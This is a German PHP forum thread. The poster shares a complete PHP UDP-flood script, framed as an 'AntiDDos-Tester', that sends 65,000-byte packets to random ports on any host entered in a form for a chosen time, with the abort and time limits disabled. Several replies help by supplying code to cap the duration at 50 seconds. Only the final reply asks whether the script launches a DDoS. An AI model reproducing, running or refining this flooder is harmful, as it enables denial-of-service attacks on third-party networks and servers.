Ankündigung

Einklappen
Keine Ankündigung bisher.

Wie kann ich ein max imput an einer zahl machen??

Einklappen

Neue Werbung 2019

Einklappen
X
  • Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge

  • Wie kann ich ein max imput an einer zahl machen??

    Hallo ich will als kleines Projekt ein AntiDDos-Tester schreiben aber daher es "SUPER" User es gibt die eine Zahl wie 99999999 Eingeben sied der Traffic so aus: --------------------------------------------------------------------------------
    Bandwidth:


    946%

    9.2 TB of 1000 GB Used / -8866164187.6 KB Free
    -------------------------------------------------------------------------------

    Desswegen will ich als Maximaler Input 50 "Sekunden" reinschreiben aber ich weiß nicht wie ;(

    Kann mir bitte jemand den fertigen code senden oder mir den code sagt der hier im Code fehlt

    DANKE GrossyTv


    Code:

    Code:
    <?php
    //UDP
    if(isset($_GET['host'])&&isset($_GET['time'])){
    $packets = 0;
    ignore_user_abort(TRUE);
    set_time_limit(0);
    $exec_time = $_GET['time'];
    $time = time();
    //print "Started: ".time('d-m-y h:i:s')."<br>";
    $max_time = $time+$exec_time;
    $host = $_GET['host'];
    for($i=0;$i<65000;$i++){
    $out .= 'X';
    }
    while(1){
    $packets++;
    if(time() > $max_time){
    break;
    }
    $rand = rand(1,65000);
    $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
    if($fp){
    fwrite($fp, $out);
    fclose($fp);
    }
    }
    echo "<center><br><br>Es wurden $packets (" . round(($packets*65)/1024, 2) . " MB) Parkete versendet ;". round($packets/$exec_time, 2) . " Parkete pro Sekunde wurden versendet! </center>\n";
    echo '<center>
    <form action="'.$surl.'" method=GET>
    <input type="hidden" name="act" value="phptools">
    Host/IP: <br><input type=text name=host><br>
    <br></br>Zeit (Sekunden): <br><input type=text name=time><br>
    <input type=submit value=Start></form></center>';
    }else{ echo '<center><br><br>
    <form action=? method=GET>
    <input type="hidden" name="act" value="phptools">
    <br></br>Host/IP: <br><input type=text name=host value=><br>
    Zeit (Sekunden): <br><input type=text name=time value=><br><br>
    <input type=submit value=Start></form></center>';
    }
    ?>

  • #2
    LIVE ANSICHT http://LegitPlay.DE #WARTUNG

    Kommentar


    • #3
      Ich habe deinen Beitrag gemeldet und zur Löschung vorgeschladen.

      Bitte informiere dich über die Forenrichtlinien und -regeln und formattiere deinen Beitrag korrekt, sowie stelle eine konkrete Frage.
      [URL="https://github.com/chrisandchris"]GitHub.com - ChrisAndChris[/URL] - [URL="https://github.com/chrisandchris/symfony-rowmapper"]RowMapper und QueryBuilder für MySQL-Datenbanken[/URL]

      Kommentar


      • #4
        Zitat von christiank Beitrag anzeigen
        ich habe deinen beitrag gemeldet und zur löschung vorgeschladen.

        Bitte infomriere dich über die forenrichtlinien und -regeln und formattiere deinen beitrag korrekt, sowie stelle eine konkrete frage.
        ...... Okey xD

        Kommentar


        • #5
          Deine 3223 Beiträge bestehen sicher alle aus:

          Zitat von ChristianK Beitrag anzeigen
          Ich habe deinen Beitrag gemeldet und zur Löschung vorgeschladen.

          Bitte infomriere dich über die Forenrichtlinien und -regeln und formattiere deinen Beitrag korrekt, sowie stelle eine konkrete Frage.

          Kommentar


          • #6
            Zitat von GrossyTv Beitrag anzeigen
            Deine 3223 Beiträge bestehen sicher alle aus:


            Nein, bestehen Sie nicht. Und jetzt mal ehrlich, wie viel Aufwand hat dich das gekostet, deinen Beitrag etwas anständig zu formatieren? Denk daran, wir arbeiten hier freiwillig und ohne Entgeld. Wenn uns jemand blöd kommt, helfen wir einfach nicht - du bist der leidtragende. Ich habe so einfach mehr Freizeit .

            Du kannst ein input-Feld direkt nicht mit einem Höchtwert belegen. Du kannst in PHP mittels einer if jedoch abfragen, ob ein Wert höher als eine Vorgabe ist:

            PHP-Code:
            if (intval($_POST['secs']) > 50) {
                echo 
            "Hey, mehr als 50 Sekunden ist nicht erlaubt!";

            [URL="https://github.com/chrisandchris"]GitHub.com - ChrisAndChris[/URL] - [URL="https://github.com/chrisandchris/symfony-rowmapper"]RowMapper und QueryBuilder für MySQL-Datenbanken[/URL]

            Kommentar


            • #7
              Zitat von ChristianK Beitrag anzeigen
              Du kannst ein input-Feld direkt nicht mit einem Höchtwert belegen.
              bei number-type Feldern schon. was aber nicht die PHP-seitige Validierung erspart.

              Kommentar


              • #8
                Zitat von Dormilich Beitrag anzeigen

                bei number-type Feldern schon. was aber nicht die PHP-seitige Validierung erspart.
                Safari ignoriert das einfach. Siehe auch: https://www.smashingmagazine.com/201...support-issue/
                [URL="https://github.com/chrisandchris"]GitHub.com - ChrisAndChris[/URL] - [URL="https://github.com/chrisandchris/symfony-rowmapper"]RowMapper und QueryBuilder für MySQL-Datenbanken[/URL]

                Kommentar


                • #9
                  Zitat von ChristianK Beitrag anzeigen

                  Nein, bestehen Sie nicht. Und jetzt mal ehrlich, wie viel Aufwand hat dich das gekostet, deinen Beitrag etwas anständig zu formatieren? Denk daran, wir arbeiten hier freiwillig und ohne Entgeld. Wenn uns jemand blöd kommt, helfen wir einfach nicht - du bist der leidtragende. Ich habe so einfach mehr Freizeit .

                  Du kannst ein input-Feld direkt nicht mit einem Höchtwert belegen. Du kannst in PHP mittels einer if jedoch abfragen, ob ein Wert höher als eine Vorgabe ist:

                  PHP-Code:
                  if (intval($_POST['secs']) > 50) {
                  echo 
                  "Hey, mehr als 50 Sekunden ist nicht erlaubt!";

                  Tut mir leid

                  Kommentar


                  • #10
                    Einen Grund zur Schliessung sehe ich noch nicht, aber ChristianK hat recht, bitte informiere Dich über unsere Forenrichtlinien, denen hast Du bei der Registrierung zugestimmt!

                    Zitat von GrossyTv
                    Kann mir bitte jemand den fertigen code senden oder mir den code sagt der hier im Code fehlt
                    [MOD: verschoben von Software-Design]
                    Competence-Center -> Enjoy the Informatrix
                    PHProcks!Einsteiger freundliche TutorialsPreComposed Packages

                    Kommentar


                    • #11
                      Hey,

                      probier es mal mit
                      PHP-Code:
                      max(0min(50intval($_POST['secs']))); 
                      Diese Zeile liefert dir als Ergebnis einen Wert zwischen 0 und dem Maximum von 50 Sekunden aus dem eingegebenen Wert.

                      Kommentar


                      • #12
                        Das kann man so auch als filter schreiben:
                        PHP-Code:
                        $secs filter_input(INPUT_POST'secs'FILTER_VALIDATE_INT, ['options' => ['min_range' => 0'max_range' => 50]]); 
                        und braucht dann noch nicht mal ein isset() vorher.

                        Kommentar


                        • #13
                          Dein Script tut was ? Ein dDoS absetzen ?
                          [URL="https://gitter.im/php-de/chat?utm_source=share-link&utm_medium=link&utm_campaign=share-link"]PHP.de Gitter.im Chat[/URL] - [URL="https://raindrop.io/user/32178"]Meine öffentlichen Bookmarks[/URL] ← Ich habe dir geholfen ? [B][URL="https://www.amazon.de/gp/wishlist/348FHGUZWTNL0"]Beschenk mich[/URL][/B].

                          Kommentar

                          Lädt...
                          X